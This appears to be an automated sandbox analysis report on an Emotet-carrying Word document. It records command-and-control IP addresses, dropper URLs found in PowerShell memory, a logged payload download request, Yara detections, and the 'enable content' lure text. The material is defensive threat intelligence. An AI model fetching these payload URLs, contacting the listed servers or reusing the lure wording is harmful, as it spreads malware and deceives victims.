Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2404344 ET CNC Feodo Tracker Reported CnC Server TCP group 23 192.168.2.22:49166 -> 84.232.229.24:80
Source: Traffic	Snort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.2.22:49167 -> 51.255.203.164:8080
Source: Traffic	Snort IDS: 2404328 ET CNC Feodo Tracker Reported CnC Server TCP group 15 192.168.2.22:49169 -> 217.160.169.110:8080
Source: Traffic	Snort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.22:49171 -> 185.183.16.47:80

Potential dropper URLs found in powershell memory

Source: powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmp

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 51.255.203.164:8080
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 217.160.169.110:8080

Downloads executable code via HTTP

Source: global traffic

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /content/lhALeS/ HTTP/1.1Host: shannared.comConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 84.232.229.24 84.232.229.24
Source: Joe Sandbox View	IP Address: 192.169.223.13 192.169.223.13

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View	ASN Name: OVHFR OVHFR
Source: Joe Sandbox View	ASN Name: RCS-RDS73-75DrStaicoviciRO RCS-RDS73-75DrStaicoviciRO
Source: Joe Sandbox View	ASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS

Source: unknown	TCP traffic detected without corresponding DNS query: 84.232.229.24
Source: unknown	TCP traffic detected without corresponding DNS query: 84.232.229.24
Source: unknown	TCP traffic detected without corresponding DNS query: 84.232.229.24
Source: unknown	TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown	TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown	TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown	TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown	TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown	TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown	TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown	TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown	TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown	TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown	TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown	TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown	TCP traffic detected without corresponding DNS query: 185.183.16.47
Source: unknown	TCP traffic detected without corresponding DNS query: 185.183.16.47
Source: unknown	TCP traffic detected without corresponding DNS query: 185.183.16.47
Source: unknown	TCP traffic detected without corresponding DNS query: 185.183.16.47
Source: unknown	TCP traffic detected without corresponding DNS query: 185.183.16.47
Source: unknown	TCP traffic detected without corresponding DNS query: 185.183.16.47

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F5248432-B174-499E-B3BD-E7523F18DF93}.tmp

Jump to behavior

Source: global traffic

HTTP traffic detected: GET /content/lhALeS/ HTTP/1.1Host: shannared.comConnection: Keep-Alive

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: shannared.com

Source: powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmp	String found in binary or memory: http://3musketeersent.net/wp-includes/TUgD/
Source: powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmp	String found in binary or memory: http://dashudance.com/thinkphp/dgs7Jm9/
Source: rundll32.exe, 00000006.00000002.2095088979.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092610452.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2094682788.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096129935.0000000001D70000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2095088979.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092610452.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2094682788.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096129935.0000000001D70000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmp	String found in binary or memory: http://jeevanlic.com/wp-content/r8M/
Source: powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmp	String found in binary or memory: http://leopardcranes.com/zynq-linux-yaayf/w/
Source: rundll32.exe, 00000006.00000002.2096042413.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092922246.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095174145.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096496954.0000000001F57000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2100155586.00000000021D7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2096042413.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092922246.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095174145.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096496954.0000000001F57000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2100155586.00000000021D7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmp	String found in binary or memory: http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/
Source: powershell.exe, 00000005.00000002.2089932064.0000000002360000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2096763886.0000000002910000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2096042413.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092922246.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095174145.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096496954.0000000001F57000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2100155586.00000000021D7000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2095818604.0000000003CE6000.00000004.00000001.sdmp	String found in binary or memory: http://shannared.com
Source: powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmp	String found in binary or memory: http://shannared.com/content/lhALeS/
Source: rundll32.exe, 00000006.00000002.2096042413.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092922246.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095174145.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096496954.0000000001F57000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2100155586.00000000021D7000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2089932064.0000000002360000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2096763886.0000000002910000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2095088979.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092610452.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2094682788.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096129935.0000000001D70000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2096042413.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092922246.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095174145.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096496954.0000000001F57000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2100155586.00000000021D7000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2095088979.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092610452.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2094682788.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096129935.0000000001D70000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000009.00000002.2096129935.0000000001D70000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmp	String found in binary or memory: https://skilmu.com/wp-admin/hQVlB8b/

E-Banking Fraud:

Yara detected Emotet

Source: Yara match	File source: 0000000F.00000002.2108207451.0000000000170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2102924374.0000000000660000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2102828167.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2094445834.0000000000710000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2095209420.00000000001F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2097508616.0000000000300000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2101092569.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2108344528.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2338438182.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2102745390.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2107924027.0000000000410000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2100869950.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2107877116.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2099763419.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2338503796.0000000000280000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2093577825.0000000000410000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2094474454.0000000000740000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2098058880.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2101004097.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2098090844.00000000003E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2108318970.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2338458694.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2095115818.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2095854537.00000000003E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2107894176.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2099872528.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2098968815.0000000000140000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2092243778.0000000000340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 7.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.660000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.340000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.3e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.740000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.3e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.660000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.5a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.280000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.3e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.3e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.250000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.280000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.410000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.410000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.740000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.5a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.340000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.410000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I of I , word
Source: Screenshot number: 4	Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I of I , words: 8,758 , C i N@m 13
Source: Screenshot number: 8	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT buttons to preview this document. a
Source: Screenshot number: 8	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT buttons to preview this
Source: Screenshot number: 8	Screenshot OCR: ENABLE CONTENT buttons to preview this document. a
Source: Document image extraction number: 0	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Kaktksw\An6othh\N49I.dll

Jump to dropped file

Very long command line found

Source: unknown	Process created: Commandline size = 5677
Source: unknown	Process created: Commandline size = 5576
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 5576	Jump to behavior

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Creates files inside the system directory

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Kizmwn\

Jump to behavior

Detected potential crypto function

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00207D7D	7_2_00207D7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002089F6	7_2_002089F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F421E	7_2_001F421E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020C424	7_2_0020C424
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F8816	7_2_001F8816
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001FF813	7_2_001FF813
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001FD013	7_2_001FD013
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00208831	7_2_00208831
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F620A	7_2_001F620A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F7605	7_2_001F7605
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F903F	7_2_001F903F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001FA83A	7_2_001FA83A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F7E34	7_2_001F7E34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001FDC2F	7_2_001FDC2F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020F411	7_2_0020F411
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F4A2B	7_2_001F4A2B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F2628	7_2_001F2628
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F1658	7_2_001F1658
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00208668	7_2_00208668
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F5856	7_2_001F5856
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001FD44C	7_2_001FD44C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F704B	7_2_001F704B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001FC07D	7_2_001FC07D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00204E4B	7_2_00204E4B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020C04C	7_2_0020C04C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00201259	7_2_00201259
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020CAA0	7_2_0020CAA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020C6AD	7_2_0020C6AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00205AB8	7_2_00205AB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F5EB9	7_2_001F5EB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F56B3	7_2_001F56B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00204693	7_2_00204693
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F8CA3	7_2_001F8CA3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F4EA1	7_2_001F4EA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001FD0DE	7_2_001FD0DE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002042E2	7_2_002042E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020DEE8	7_2_0020DEE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F9CC8	7_2_001F9CC8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002006C2	7_2_002006C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020D2CB	7_2_0020D2CB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001FC6EF	7_2_001FC6EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F94EC	7_2_001F94EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F9AE1	7_2_001F9AE1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020BF25	7_2_0020BF25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020DB25	7_2_0020DB25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001FCF11	7_2_001FCF11
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020D530	7_2_0020D530
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F213E	7_2_001F213E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F492A	7_2_001F492A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00205115	7_2_00205115
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020231B	7_2_0020231B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00208F65	7_2_00208F65
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00202965	7_2_00202965
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020676B	7_2_0020676B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00200F6D	7_2_00200F6D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00207570	7_2_00207570
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F3D4E	7_2_001F3D4E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00201B71	7_2_00201B71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020DD78	7_2_0020DD78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00203D7C	7_2_00203D7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001FCB42	7_2_001FCB42
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00206B45	7_2_00206B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001FA176	7_2_001FA176
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020654F	7_2_0020654F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002099A4	7_2_002099A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00205DAA	7_2_00205DAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020EDB9	7_2_0020EDB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020E19F	7_2_0020E19F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F4BDE	7_2_001F4BDE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001FADCE	7_2_001FADCE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002037F4	7_2_002037F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020B3FE	7_2_0020B3FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F6BC0	7_2_001F6BC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002073C0	7_2_002073C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002077C0	7_2_002077C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00209DC0	7_2_00209DC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002093C9	7_2_002093C9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020CDCC	7_2_0020CDCC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F2DEE	7_2_001F2DEE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020B1D2	7_2_0020B1D2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F5BE1	7_2_001F5BE1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0022303C	7_2_0022303C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00231E14	7_2_00231E14
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A502C	7_2_002A502C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002AC83F	7_2_002AC83F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002AC014	7_2_002AC014
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A3856	7_2_002A3856
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00299055	7_2_00299055
